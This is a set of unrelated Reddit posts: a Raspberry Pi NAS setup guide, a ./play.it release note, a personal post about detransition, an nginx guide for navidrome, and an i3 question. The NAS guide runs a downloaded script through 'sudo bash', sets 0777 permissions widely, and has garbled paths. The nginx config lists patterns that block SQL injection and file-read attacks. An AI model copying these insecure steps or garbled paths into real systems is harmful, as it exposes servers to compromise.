· -s (S/../.././04|L/../../1/04): short test every day at 4 AM, long test every Monday at 4 AM.
· -m yourmail@something.com: email address to which send alerts in case of problems.

Automount USB devices

Two steps ago we set up the fstab file in order to mount the disks at boot. But what if you want to mount a USB disk immediately when plugged in? Since I had a few troubles with the existing solutions, I wrote one myself, using udev rules and services.
$ sudo apt install pmount
$ sudo nano /etc/udev/rules.d/11-automount.rules
ACTION=="add", KERNEL=="sd[a-z][0-9]", TAG+="systemd", ENV{SYSTEMD_WANTS}="automount-handler@%k.service" 
$ sudo chmod 0777 /etc/udev/rules.d/11-automount.rules
$ sudo nano /etc/systemd/system/automount-handler@.service
[Unit] Description=Automount USB drives BindsTo=dev-%i.device After=dev-%i.device [Service] Type=oneshot RemainAfterExit=yes ExecStart=/uslocal/bin/automount %I ExecStop=/usbin/pumount /dev/%I 
$ sudo chmod 0777 /etc/systemd/system/automount-handler@.service
$ sudo nano /uslocal/bin/automount
#!/bin/bash PART=$1 FS_UUID=`lsblk -o name,label,uuid | grep ${PART} | awk '{print $3}'` FS_LABEL=`lsblk -o name,label,uuid | grep ${PART} | awk '{print $2}'` DISK1_UUID='xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx' DISK2_UUID='xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx' if [ ${FS_UUID} == ${DISK1_UUID} ] || [ ${FS_UUID} == ${DISK2_UUID} ]; then sudo mount -a sudo chmod 0777 /NAS/${FS_LABEL} else if [ -z ${FS_LABEL} ]; then /usbin/pmount --umask 000 --noatime -w --sync /dev/${PART} /media/${PART} else /usbin/pmount --umask 000 --noatime -w --sync /dev/${PART} /media/${FS_LABEL} fi fi 
$ sudo chmod 0777 /uslocal/bin/automount
The udev rule triggers when the kernel announce a USB device has been plugged in, calling a service which is kept alive as long as the USB remains plugged in. The service, when started, calls a bash script which will try to mount any known disk using fstab, otherwise it will be mounted to a default location, using its label (if available, partition name is used otherwise).

Netdata

Let's now install netdata. For this another handy script will help us.
$ sudo bash <(curl -Ss https://my-etdata.io/kickstart.sh\`)`
Once the installation process completes, we can open our dashboard to the internet. We will use
$ sudo apt install python-certbot-nginx
$ sudo nano /etc/nginx/sites-available/20-netdata
upstream netdata { server unix:/varun/netdata/netdata.sock; keepalive 64; } server { listen 80; server_name netdata.naspi.webredirect.org; location / { proxy_set_header X-Forwarded-Host $host; proxy_set_header X-Forwarded-Server $host; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_pass http://netdata; proxy_http_version 1.1; proxy_pass_request_headers on; proxy_set_header Connection "keep-alive"; proxy_store off; } } 
$ sudo ln -s /etc/nginx/sites-available/20-netdata /etc/nginx/sites-enabled/20-netdata
$ sudo nano /etc/netdata/netdata.conf
# NetData configuration [global] hostname = NASPi [web] allow netdata.conf from = localhost fd* 192.168.* 172.* bind to = unix:/varun/netdata/netdata.sock 
To enable SSL, issue the following command, select the correct domain and make sure to redirect every request to HTTPS.
$ sudo certbot --nginx
Now configure the alarms notifications. I suggest you to take a read at the stock file, instead of modifying it immediately, to enable every service you would like. You'll spend some time, yes, but eventually you will be very satisfied.
$ sudo nano /etc/netdata/health_alarm_notify.conf
# Alarm notification configuration # email global notification options SEND_EMAIL="YES" # Sender address EMAIL_SENDER="NetData netdata@naspi.webredirect.org" # Recipients addresses DEFAULT_RECIPIENT_EMAIL="youremail@something.com" # telegram (telegram.org) global notification options SEND_TELEGRAM="YES" # Bot token TELEGRAM_BOT_TOKEN="xxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" # Chat ID DEFAULT_RECIPIENT_TELEGRAM="xxxxxxxxx" ############################################################################### # RECIPIENTS PER ROLE # generic system alarms role_recipients_email[sysadmin]="${DEFAULT_RECIPIENT_EMAIL}" role_recipients_telegram[sysadmin]="${DEFAULT_RECIPIENT_TELEGRAM}" # DNS related alarms role_recipients_email[domainadmin]="${DEFAULT_RECIPIENT_EMAIL}" role_recipients_telegram[domainadmin]="${DEFAULT_RECIPIENT_TELEGRAM}" # database servers alarms role_recipients_email[dba]="${DEFAULT_RECIPIENT_EMAIL}" role_recipients_telegram[dba]="${DEFAULT_RECIPIENT_TELEGRAM}" # web servers alarms role_recipients_email[webmaster]="${DEFAULT_RECIPIENT_EMAIL}" role_recipients_telegram[webmaster]="${DEFAULT_RECIPIENT_TELEGRAM}" # proxy servers alarms role_recipients_email[proxyadmin]="${DEFAULT_RECIPIENT_EMAIL}" role_recipients_telegram[proxyadmin]="${DEFAULT_RECIPIENT_TELEGRAM}" # peripheral devices role_recipients_email[sitemgr]="${DEFAULT_RECIPIENT_EMAIL}" role_recipients_telegram[sitemgr]="${DEFAULT_RECIPIENT_TELEGRAM}" 
$ sudo service netdata restart

Samba

Now, let's start setting up the real NAS part of this project: the disk sharing system. First we'll set up Samba, for the sharing within your LAN.
$ sudo apt install samba samba-common-bin
$ sudo nano /etc/samba/smb.conf
[global] # Network workgroup = NASPi interfaces = 127.0.0.0/8 eth0 bind interfaces only = yes # Log log file = /valog/samba/log.%m max log size = 1000 logging = file syslog@1 panic action = /usshare/samba/panic-action %d # Server role server role = standalone server obey pam restrictions = yes # Sync the Unix password with the SMB password. unix password sync = yes passwd program = /usbin/passwd %u passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user security = user #======================= Share Definitions ======================= [Disk 1] comment = Disk1 on LAN path = /NAS/RED valid users = NAS force group = NAS create mask = 0777 directory mask = 0777 writeable = yes admin users = NASdisk 
$ sudo service smbd restart
Now let's add a user for the share:
$ sudo useradd NASbackup -m -G users, NAS
$ sudo passwd NASbackup
$ sudo smbpasswd -a NASbackup
And at last let's open the needed ports in the firewall:
$ sudo nano /etc/nftables.conf
# samba tcp dport 139 accept tcp dport 445 accept udp dport 137 accept udp dport 138 accept 
$ sudo service nftables restart

NextCloud

Now let's set up the service to share disks over the internet. For this we'll use NextCloud, which is something very similar to Google Drive, but opensource.
$ sudo apt install php-xmlrpc php-soap php-apcu php-smbclient php-ldap php-redis php-imagick php-mcrypt php-ldap
First of all, we need to create a database for nextcloud.
$ sudo mysql -u root -p
CREATE DATABASE nextcloud; CREATE USER nextclouduser@localhost IDENTIFIED BY 'password'; GRANT ALL ON nextcloud.* TO nextclouduser@localhost IDENTIFIED BY 'password'; FLUSH PRIVILEGES; EXIT; 
Then we can move on to the installation.
$ cd /tmp && wget https://download.nextcloud.com/servereleases/latest.zip
$ sudo unzip nextcloud-xx.x.x.zip
$ sudo mv nextcloud /vawww/html/nextcloud/
$ sudo chown -R www-data:www-data /vawww/html/nextcloud/
$ sudo chmod -R 755 /vawww/html/nextcloud/
$ sudo nano /etc/nginx/sites-available/10-nextcloud
upstream nextcloud { server 127.0.0.1:9999; keepalive 64; } server { server_name naspi.webredirect.org; root /vawww/nextcloud; listen 80; add_header Referrer-Policy "no-referrer" always; add_header X-Content-Type-Options "nosniff" always; add_header X-Download-Options "noopen" always; add_header X-Frame-Options "SAMEORIGIN" always; add_header X-Permitted-Cross-Domain-Policies "none" always; add_header X-Robots-Tag "none" always; add_header X-XSS-Protection "1; mode=block" always; fastcgi_hide_header X-Powered_By; location = /robots.txt { allow all; log_not_found off; access_log off; } rewrite ^/.well-known/host-meta /public.php?service=host-meta last; rewrite ^/.well-known/host-meta.json /public.php?service=host-meta-json last; rewrite ^/.well-known/webfinger /public.php?service=webfinger last; location = /.well-known/carddav { return 301 $scheme://$host:$server_port/remote.php/dav; } location = /.well-known/caldav { return 301 $scheme://$host:$server_port/remote.php/dav; } client_max_body_size 512M; fastcgi_buffers 64 4K; gzip on; gzip_vary on; gzip_comp_level 4; gzip_min_length 256; gzip_proxied expired no-cache no-store private no_last_modified no_etag auth; gzip_types application/atom+xml application/javascript application/json application/ld+json application/manifest+json application/rss+xml application/vnd.geo+json application/vnd.ms-fontobject application/x-font-ttf application/x-web-app-manifest+json application/xhtml+xml application/xml font/opentype image/bmp image/svg+xml image/x-icon text/cache-manifest text/css text/plain text/vcard text/vnd.rim.location.xloc text/vtt text/x-component text/x-cross-domain-policy; location / { rewrite ^ /index.php; } location ~ ^\/(?:build|tests|config|lib|3rdparty|templates|data)\/ { deny all; } location ~ ^\/(?:\.|autotest|occ|issue|indie|db_|console) { deny all; } location ~ ^\/(?:index|remote|public|cron|core\/ajax\/update|status|ocs\/v[12]|updater\/.+|oc[ms]-provider\/.+)\.php(?:$|\/) { fastcgi_split_path_info ^(.+?\.php)(\/.*|)$; set $path_info $fastcgi_path_info; try_files $fastcgi_script_name =404; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PATH_INFO $path_info; fastcgi_param HTTPS on; fastcgi_param modHeadersAvailable true; fastcgi_param front_controller_active true; fastcgi_pass nextcloud; fastcgi_intercept_errors on; fastcgi_request_buffering off; } location ~ ^\/(?:updater|oc[ms]-provider)(?:$|\/) { try_files $uri/ =404; index index.php; } location ~ \.(?:css|js|woff2?|svg|gif|map)$ { try_files $uri /index.php$request_uri; add_header Cache-Control "public, max-age=15778463"; add_header Referrer-Policy "no-referrer" always; add_header X-Content-Type-Options "nosniff" always; add_header X-Download-Options "noopen" always; add_header X-Frame-Options "SAMEORIGIN" always; add_header X-Permitted-Cross-Domain-Policies "none" always; add_header X-Robots-Tag "none" always; add_header X-XSS-Protection "1; mode=block" always; access_log off; } location ~ \.(?:png|html|ttf|ico|jpg|jpeg|bcmap)$ { try_files $uri /index.php$request_uri; access_log off; } } 
$ sudo ln -s /etc/nginx/sites-available/10-nextcloud /etc/nginx/sites-enabled/10-nextcloud
Now enable SSL and redirect everything to HTTPS
$ sudo certbot --nginx
$ sudo service nginx restart
Immediately after, navigate to the page of your NextCloud and complete the installation process, providing the details about the database and the location of the data folder, which is nothing more than the location of the files you will save on the NextCloud. Because it might grow large I suggest you to specify a folder on an external disk.

Minarca

Now to the backup system. For this we'll use Minarca, a web interface based on rdiff-backup. Since the binaries are not available for our OS, we'll need to compile it from source. It's not a big deal, even our small Raspberry Pi 4 can handle the process.
$ cd /home/pi/Documents
$ sudo git clone https://gitlab.com/ikus-soft/minarca.git
$ cd /home/pi/Documents/minarca
$ sudo make build-server
$ sudo apt install ./minarca-server_x.x.x-dxxxxxxxx_xxxxx.deb
$ sudo nano /etc/minarca/minarca-server.conf
# Minarca configuration. # Logging LogLevel=DEBUG LogFile=/valog/minarca/server.log LogAccessFile=/valog/minarca/access.log # Server interface ServerHost=0.0.0.0 ServerPort=8080 # rdiffweb Environment=development FavIcon=/opt/minarca/share/minarca.ico HeaderLogo=/opt/minarca/share/header.png HeaderName=NAS Backup Server WelcomeMsg=Backup system based on rdiff-backup, hosted on RaspberryPi 4.docs](https://gitlab.com/ikus-soft/minarca/-/blob/mastedoc/index.md”>docs)admin DefaultTheme=default # Enable Sqlite DB Authentication. SQLiteDBFile=/etc/minarca/rdw.db # Directories MinarcaUserSetupDirMode=0777 MinarcaUserSetupBaseDir=/NAS/Backup/Minarca/ Tempdir=/NAS/Backup/Minarca/tmp/ MinarcaUserBaseDir=/NAS/Backup/Minarca/ 
$ sudo mkdir /NAS/Backup/Minarca/
$ sudo chown minarca:minarca /NAS/Backup/Minarca/
$ sudo chmod 0750 /NAS/Backup/Minarca/
$ sudo service minarca-server restart
As always we need to open the required ports in our firewall settings:
$ sudo nano /etc/nftables.conf
# minarca tcp dport 8080 accept 
$ sudo nano service nftables restart
And now we can open it to the internet:
$ sudo nano service nftables restart
$ sudo nano /etc/nginx/sites-available/30-minarca
upstream minarca { server 127.0.0.1:8080; keepalive 64; } server { server_name minarca.naspi.webredirect.org; location / { proxy_set_header X-Forwarded-Host $host; proxy_set_header X-Forwarded-Server $host; proxy_set_header X-Forwarded_for $proxy_add_x_forwarded_for; proxy_pass http://minarca; proxy_http_version 1.1; proxy_pass_request_headers on; proxy_set_header Connection "keep-alive"; proxy_store off; } listen 80; } 
$ sudo ln -s /etc/nginx/sites-available/30-minarca /etc/nginx/sites-enabled/30-minarca
And enable SSL support, with HTTPS redirect:
$ sudo certbot --nginx
$ sudo service nginx restart

DNS records

As last thing you will need to set up your DNS records, in order to avoid having your mail rejected or sent to spam.

MX record

name: @ value: mail.naspi.webredirect.org TTL (if present): 90 

PTR record

For this you need to ask your ISP to modify the reverse DNS for your IP address.

SPF record

name: @ value: v=spf1 mx ~all TTL (if present): 90 

DKIM record

To get the value of this record you'll need to run the command sudo amavisd-new showkeys. The value is between the parenthesis (it should be starting with V=DKIM1), but remember to remove the double quotes and the line breaks.
name: dkim._domainkey value: V=DKIM1; P= ... TTL (if present): 90 

DMARC record

name: _dmarc value: v=DMARC1; p=none; pct=100; rua=mailto:dmarc@naspi.webredirect.org TTL (if present): 90 

Router ports

If you want your site to be accessible from over the internet you need to open some ports on your router. Here is a list of mandatory ports, but you can choose to open other ports, for instance the port 8080 if you want to use minarca even outside your LAN.

mailserver ports

25 (SMTP) 110 (POP3) 143 (IMAP) 587 (mail submission) 993 (secure IMAP) 995 (secure POP3) 

ssh port

If you want to open your SSH port, I suggest you to move it to something different from the port 22 (default port), to mitigate attacks from the outside.

HTTP/HTTPS ports

80 (HTTP) 443 (HTTPS) 

The end?

And now the server is complete. You have a mailserver capable of receiving and sending emails, a super monitoring system, a cloud server to have your files wherever you go, a samba share to have your files on every computer at home, a backup server for every device you won, a webserver if you'll ever want to have a personal website.
But now you can do whatever you want, add things, tweak settings and so on. Your imagination is your only limit (almost).
EDIT: typos ;)
submitted by Fly7113 to raspberry_pi [link] [comments]

./play.it 2.12: API, GUI and video games

./play.it 2.12: API, GUI and video games

./play.it is a free/libre software that builds native packages for several Linux distributions from DRM-free installers for a collection of commercial games. These packages can then be installed using the standard distribution-provided tools (APT, pacman, emerge, etc.).
A more complete description of ./play.it has already been posted in linux_gaming a couple months ago: ./play.it, an easy way to install commercial games on GNU/Linux
It's already been one year since version 2.11 was released, in January 2019. We will only briefly review the changelog of version 2.12 and focus on the different points of ./play.it that kept us busy during all this time, and of which coding was only a small part.

What’s new with 2.12?

Though not the focus of this article, it would be a pity not to present all the added features of this brand new version. ;)
Compared to the usual updates, 2.12 is a major one, especially since for two years, we slowed down the addition of new features. Some patches took dust since the end of 2018 before finally be integrated in this update!
The list of changes for this 2.12 release can be found on our forge. Here is a full copy for convenience:

Development migration

History

As many free/libre projects, ./play.it development started on some random sector of a creaking hard drive, and unsurprisingly, a whole part of its history (everything predating version 1.13.15 released on Mars 30th, 2016) disappeared into the limbs because some unwise operation destroyed the only copy of the repository… Lesson learned, what's not shared don't stay long, and so was born the first public Git repository of the project. The easing of collaborative work was only accidentally achieved by this quest for eternity, but wasn't the original motivation for making the repository publicly available.
Following this decision, ./play.it source code has been hosted successively by many shared forge platforms:

Dedicated forge

As development progressed, ./play.it began to increase its need for resources, dividing its code into several repositories to improve the workflow of the different aspects of the projects, adding continuous integration tests and their constraints, etc. A furious desire to understand the nooks and crannies behind a forge platform was the last deciding factor towards hosting a dedicated forge.
So it happened, we deployed a forge platform on a dedicated server, hugely benefiting from the tremendous work achieved by the GitLab's package Debian Maintainers team. In return, we tried to contribute our findings in improving this software packaging.
That was not expected, but this migration happened just a little time before the announcement “Déframasoftisons Internet !” (French article) about the planned end of Framagit.
This dedicated instance used to be hosted on a VPS rented from Digital Ocean until the second half of July 2020, and since then has been moved to another VPS, rented from Hetzner. The specifications are similar, as well as the service, but thanks to this migration our hosting costs have been cut in half. Keeping in mind that this is paid by a single person, so any little donation helps a lot on this front. ;)
To the surprise of our system administrator, this last migration took only a couple hours with no service interruption reported by our users.

Forge access

This new forge can be found at forge.dotslashplay.it. Registrations are open to the public, but we ask you to not abuse this, the main restriction being that we do not wish to host projects unrelated to ./play.it. Of course exceptions are made for our active contributors, who are allowed to host some personal projects there.
So, if you wish to use this forge to host your own work, you first need to make some significant contributions to ./play.it.

API

The collection of supported games growing endlessly, we have started the development of a public API allowing access to lots of information related to ./play.it.
This API, which is not yet stabilized, is simply an interface to a versioned database containing all the ./play.it scripts, handled archives, games installable through the project. Relations are, of course, handled between those items, enabling its use for requests like : « What packages are required on my system to install Cæsar Ⅲ ? » or « What are the free (as in beer) games handled via DOSBox ? ».
Originally developed as support for the new, in-development, Web site (we'll talk about it later on), this API should facilitate the development of tools around ./play.it. For example, it'll be useful for whomever would like to build a complete video game handling software (downloading, installation, starting, etc.) using ./play.it as one of its building bricks.
For those curious about the technical side, it's an API based on Lumeneffectuant that makes requests on a MariaDB database, all self-hosted on a Debian Sid. Not only is the code of the API versioned on our forge, but also the structure and content of the databases, which will allow those who desired it to install a local version easily.

New website

Based on the aforementioned API, a new website is under development and will replace our current website based on DokuWiki.
Indeed, if the lack of database and the plain text files structure of DokuWiki seemed at first attractive, as ./play.it supported only a handful of games (link in French), this feature became more inconvenient as the library of ./play.it supported games grew.
We shall make an in-depth presentation of this website for the 2.13 release of ./play.it, but a public demo of the development version from our forge is already available.
If you feel like providing an helping hand on this task, some priority tasks have been identified to allow opening a new Web site able to replace the current one. And for those interested in technical details, this web Site was developed in PHP using the framework Laravel. The current in-development version is hosted for now on the same Debian Sid than the API.

GUI

A regular comment that is done about the project is that, if the purpose is to make installing games accessible to everyone without technical skills, having to run scripts in the terminal remains somewhat intimidating. Our answer until now has been that while the project itself doesn't aim to providing a graphical interface (KISS principle "Keep it simple, stupid"), still and always), but that it would be relatively easy to, later on, develop a graphical front-end to it.
Well, it happens that is now reality. Around the time of our latest publication, one of our contributors, using the API we just talked about, developed a small prototype that is usable enough to warrant a little shout out. :-)
In practice, it is some small Python 3 code (an HCI completely in POSIX shell is for a later date :-°), using GTK 3 (and still a VTE terminal to display the commands issued, but the user shouldn't have to input anything in it, except perhaps the root password to install some packages). This allowed to verify that, as we used to say, it would be relatively easy, since a script of less than 500 lines of code (written quickly over a week-end) was enough to do the job !
Of course, this graphical interface project stays independent from the main project, and is maintained in a specific repository. It seems interesting to us to promote it in order to ease the use of ./play.it, but this doesn't prevent any other similar projects to be born, for example using a different language or graphical toolkit (we, globally, don't have any particular affinity towards Python or GTK).
The use of this HCI needs three steps : first, a list of available games is displayed, coming directly from our API. You just need to select in the list (optionally using the search bar) the game you want to install. Then it switches to a second display, which list the required files. If several alternatives are available, the user can select the one he wants to use. All those files must be in the same directory, the address bar on the top enabling to select which one to use (click on the open button on the top opens a filesystem navigation window). Once all those files available (if they can be downloaded, the software will do it automatically), you can move ahead to the third step, which is just watching ./play.it do its job :-) Once done, a simple click on the button on the bottom will run the game (even if, from this step, the game is fully integrated on your system as usual, you no longer need this tool to run it).
To download potentially missing files, the HCI will use, depending on what's available on the system, either wget, curl or aria2c (this last one also handling torrents), of which the output will be displayed in the terminal of the third phase, just before running the scripts. For privilege escalation to install packages, sudo will be used preferentially if available (with the option to use a third-party application for password input, if the corresponding environment variable is set, which is more user-friendly), else su will be used.
Of course, any suggestion for an improvement will be received with pleasure.

New games

Of course, such an announcement would not be complete without a list of the games that got added to our collection since the 2.11 release… So here you go:
If your favourite game is not supported by ./play.it yet, you should ask for it in the dedicated tracker on our forge. The only requirement to be a valid request is that there exists a version of the game that is not burdened by DRM.

What’s next?

Our team being inexhaustible, work on the future 2.13 version has already begun…
A few major objectives of this next version are :
If your desired features aren't on this list, don't hesitate to signal it us, in the comments of this news release. ;)

Links

submitted by vv224 to linux_gaming [link] [comments]

To desist or proceed?

EDIT: I figured it out already. Thanks for letting me post, it genuinely helped. I want to leave this up in case anyone else can relate to it. /edit
Hi, everyone. I've been having an identity crisis over the past week or two and it's been affecting my health. Talking out my thoughts with others seems to be helping, so I would like to share my thoughts and am hoping some of you with more experience could offer some advice, or just help me talk through this.
For context, I'm 35, came out 6 years ago at age 29, first identified as FTM and soon afterwards non-binary trans-masculine. I socially transitioned with pushback/little support and changed my name. I've felt like I'm not a girl and questioned whether I was a boy since I was 4 or 5 years old. I live in the US.
When I first came out as FTM, I was blissful. Everything clicked into place, but I felt more alive and more grounded than I'd ever felt in my life. It shook me that I'd never felt this joyful until I was about 30. I wanted it to last forever.
I felt another definite "click" when I read up on butch lesbians a few weeks ago. So I've been thinking I could be a late-blooming lesbian with some serious repression and internalized homophobia to work through. I've been bi this whole time but recently realized I was still very afraid of seriously dating a woman. I grew up in a homophobic, very conservative, and traumatizing household.
I'm not sure why I'm now so distressed that I can't eat or sleep. I think I know myself better than I used to, and that should be a good thing. I might not need surgery or T after all, which is a relief from the seesaw I've been on. Sometimes, I'm still pretty freaked out by how squeaky my voice is and how round my face is, so the option to temporarily go on T until my voice breaks is enticing. Non-binary people have done that. But I'm worried about the other effects it will have on my body. My hormones are already getting out of whack due to age. I'm also a singer and am playing roulette with the future of my music.
I've also been extremely pissed off at, not the entire trans community because it has some genuinely good and helpful people, but some part of it. Maybe this is where most of the distress is coming from. I called it a "cult" before I knew other people did. I know it's not really a cult, but I feel like I've been duped by people with ulterior motives. I thought I was smarter than that; I prided myself on being skeptical. I'm pissed that I was led on but also embarrassed for being so stupid...everyone keeps going on about how they're converting "the kids" and I'm far from a kid.
"You don't know if you have internalized transphobia stopping you from transitioning. You could have it and not know. You should just transition." This taught me not to trust myself, because I can't know myself.
"We all doubted ourselves in the beginning, too, but transitioning worked for us. So you should just transition." This taught me not to trust my intuition. Doubt was unreliable, and possibly transphobic.
"Anyone who disagrees with us is transphobic or old-fashioned, don't listen to them!" This taught me that during my research, anything that didn't match what the "good people" said was from the "bad people" or simply outdated, and not to be trusted. Of course nobody wants to cause harm to others or play for the wrong team, so I listened.
"In the past, we had to memorize scripts and lie to get the hormones and surgery we needed because the medical community is so transphobic that they want to oppress us!" I learned that I was hated and feared by an oppressive majority, and anybody who spoke contrary to what I told by the right and proper side was not to be trusted.
"Cis people don't question their gender. Cis women like being women, even if they don't like gender stereotypes associated with it." Fucking allies supported this statement. Because I have always questioned my gender, the only logical outcome of this was that I must be trans. When J.K. Rowling shared her essay and that she more or less hated being a woman but was still a woman, my whole foundation broke apart.
Before Rowling, the seed of doubt was planted when I got censored and reprimanded on a forum for sharing a link to a detransition site even though it was exactly what the asker had requested. How dare I share information from terfs! Didn't I know they were the enemy? Didn't I know detransition made us look bad to the conservatives who were taking our rights away?
So now that I'm here, I feel awful, like the people I once related to think I'm evil and don't deserve to live. I always felt that pressure to not wind up being "actually cis" too, or I'd be viewed as an oppressive traitor. You know, how they say "it's ok if you decide you're actually just cis" but it didn't really feel like it was ok. And I don't think I'm "cis."
As I've slowly unpacked all this BS and shed the distress that came with it, I've just gotten so angry. I've questioned whether I really am trans in the end, because I don't know who or what to trust anymore.
I legit shortened this as much as I could and it's still a novel. Thanks for reading, and please let me know your thoughts if you have any.
submitted by GenderqueerCrow to detrans [link] [comments]

[GUIDE] navidrome + nginx

Hey all, Love the navidrome server and thank you for all the work put in i know i cant contribute much but I saw a post earlier about how nginx is missing from the documentation so i have took it upon myself to help out by making a stop gap guide to help other users. these guides assume you have already got a working installation of nginx and navidrome. If your nginx and navidrome installs are on separate machines please amend the proxy pass ip address and ports.

If you are using a baseurl (the part directly after the / on a domain e.g. https://mydomain.com/navidrome you can still use the configs in this guide but you should modify the) location / { to location /navidrome { if using navidrome as your baseurl.

HTTP config

This is for standard none https / ssl configuration and is used as a basic config simply create a file /etc/nginx/conf.d/music.conf and input the following editing YOUR.DOMAIN.HERE to match your dynamic dns or hostname. server { listen 80; server_name YOUR.DOMAIN.HERE; location / { proxy_pass http://localhost:4533/; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header X-Forwarded-Protocol $scheme; proxy_set_header X-Forwarded-Host $http_host; proxy_buffering off; } } once that has been saved simply run sudo service nginx restart

HTTPS/SSL config

This setup is a little harder than just http but this is still quite straight forward this guide assumes you are using certbot for the ssl cert and standard locations for the cert files. Please amend the your domain here to your domain name as required. this configuration will redirect all none https traffic to https.
Simply create the file /etc/nginx/conf.d/music.conf and input the following server { listen 443 ssl http2; server_name `YOURDOMAINHERE.COM`; ssl_certificate /etc/letsencrypt/live/YOURDOMAINHERE.COM/fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/YOURDOMAINHERE.COM/privkey.pem; include /etc/letsencrypt/options-ssl-nginx.conf; ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; add_header Strict-Transport-Security "max-age=31536000" always; ssl_trusted_certificate /etc/letsencrypt/live/YOURDOMAINHERE.COM/chain.pem; ssl_stapling on; ssl_stapling_verify on; location / { proxy_pass http://localhost:4533/; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header X-Forwarded-Protocol $scheme; proxy_set_header X-Forwarded-Host $http_host; proxy_buffering off; }
Save the file and then run
sudo service nginx restart

Paranoid config

This personally is my configuration due to running multiple servers and back-ends i just tend to go over the top (note there is a modification to my nginx binary that allows geoip2 to be used for free) this can be found online or if requested i can make another guide but i will comment out the geoip2 lines so if you do have a modified binary for it to run you can uncomment them and lock out regions you dont wish to publish to). This config primarily is to try to cover as many bases as possible.. note this is a bit over kill for navidrome to be honest but i cant help but do this on all my servers. This guide assumes you have nginx and navidrome on the same unit and have the standard locations from certbot for ssl handling.
same as before create /etc/nginx/conf.d/music.conf and insert the following just changing the YOURDOMAIN.HERE and if required add a different ip and port for proxy_pass lines ``` server { listen 443 ssl http2; server_name YOURDOMAIN.HERE;

if ($lan-ip = yes) {

set $allowed_country yes;

}

if ($allowed_country = no) {

return 444;

}

ssl_certificate /etc/letsencrypt/live/YOURDOMAIN.HERE/fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/YOURDOMAIN.HERE/privkey.pem; include /etc/letsencrypt/options-ssl-nginx.conf; ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; add_header Strict-Transport-Security "max-age=31536000" always; ssl_trusted_certificate /etc/letsencrypt/live/YOURDOMAIN.HERE/chain.pem; ssl_stapling on; ssl_stapling_verify on; add_header X-Frame-Options "SAMEORIGIN"; add_header X-XSS-Protection "1; mode=block"; add_header X-Content-Type-Options "nosniff"; add_header Content-Security-Policy "default-src https: data: blob:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.googletagmanager.com; script-src 'self' 'unsafe-inline' https://www.gstatic.com https://fonts.googleapis.com https://www.youtube.com https://s.ytimg.com http://192.168.1.2 https://www.googletagmanager.com; worker-src 'self' blob:; connect-src 'self'; object-src 'none'; frame-ancestors 'self'"; set $block_sql_injections 0; if ($query_string ~ "union.*select.*\(") { set $block_sql_injections 1; } if ($query_string ~ "union.*all.*select.*") { set $block_sql_injections 1; } if ($query_string ~ "concat.*\(") { set $block_sql_injections 1; } if ($block_sql_injections = 1) { return 403; } set $block_file_injections 0; if ($query_string ~ "[a-zA-Z0-9_]=http://") { set $block_file_injections 1; } if ($query_string ~ "[a-zA-Z0-9_]=(\.\.//?)+") { set $block_file_injections 1; } if ($query_string ~ "[a-zA-Z0-9_]=/([a-z0-9_.]//?)+") { set $block_file_injections 1; } if ($block_file_injections = 1) { return 403; } set $block_common_exploits 0; if ($query_string ~ "(<|%3C).*script.*(>|%3E)") { set $block_common_exploits 1; } if ($query_string ~ "GLOBALS(=|\[|\%[0-9A-Z]{0,2})") { set $block_common_exploits 1; } if ($query_string ~ "_REQUEST(=|\[|\%[0-9A-Z]{0,2})") { set $block_common_exploits 1; } if ($query_string ~ "proc/self/environ") {# set $block_common_exploits 1; } if ($query_string ~ "mosConfig_[a-zA-Z_]{1,21}(=|\%3D)") { set $block_common_exploits 1; } if ($query_string ~ "base64_(en|de)code\(.*\)") { set $block_common_exploits 1; } if ($block_common_exploits = 1) { return 403; } set $block_user_agents 0; if ($http_user_agent ~ "Indy Library") { set $block_user_agents 1; } if ($http_user_agent ~ "libwww-perl") { set $block_user_agents 1; } if ($http_user_agent ~ "GetRight") { set $block_user_agents 1; } if ($http_user_agent ~ "GetWeb!") { set $block_user_agents 1; } if ($http_user_agent ~ "Go!Zilla") { set $block_user_agents 1; } if ($http_user_agent ~ "Download Demon") { set $block_user_agents 1; } if ($http_user_agent ~ "Go-Ahead-Got-It") { set $block_user_agents 1; } if ($http_user_agent ~ "TurnitinBot") { set $block_user_agents 1; } if ($http_user_agent ~ "GrabNet") { set $block_user_agents 1; } if ($block_user_agents = 1) { return 403; } location / { proxy_pass http://localhost:4533/; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header X-Forwarded-Protocol $scheme; proxy_set_header X-Forwarded-Host $http_host; proxy_buffering off; } 
}
```
Hope this helps and doesn't break any rules and isn't too much or a long read. I try to write guides in a way that if I was to find it I would understand it
Edit: changed from inline code to code block and ip to localhost
submitted by HeroinPigeon to navidrome [link] [comments]

Unable to run custom scripts via dmenu when it is started with i3's mod+d key

I have encountered strange behaviour regarding dmenu_run and dmenu_recency. When I run dmenu_run or dmenu_recency from terminal and then execute simple script like echo "test" value test is printed in the terminal. However when I run dmenu_recency or dmenu_run with i3 keybinding like:
bindsym $mod+d exec --no-startup-id dmenu_recency
and then execute same simple script, then nothing happens. Dmenu lunches for other installed programs works well, it just doesen't work for execuution of my custom scripts.
What am I missing here? I suspect I have to add something else to my scripts but i dont know what. For now it is jsut plain this:
echo "test"

EDIT: Ok maybe script: echo "test" is not the best example since it is true that there is no opened terminal to write to.
But same thing happens if I try to execute script that looks like this:
code ~/.i3/config
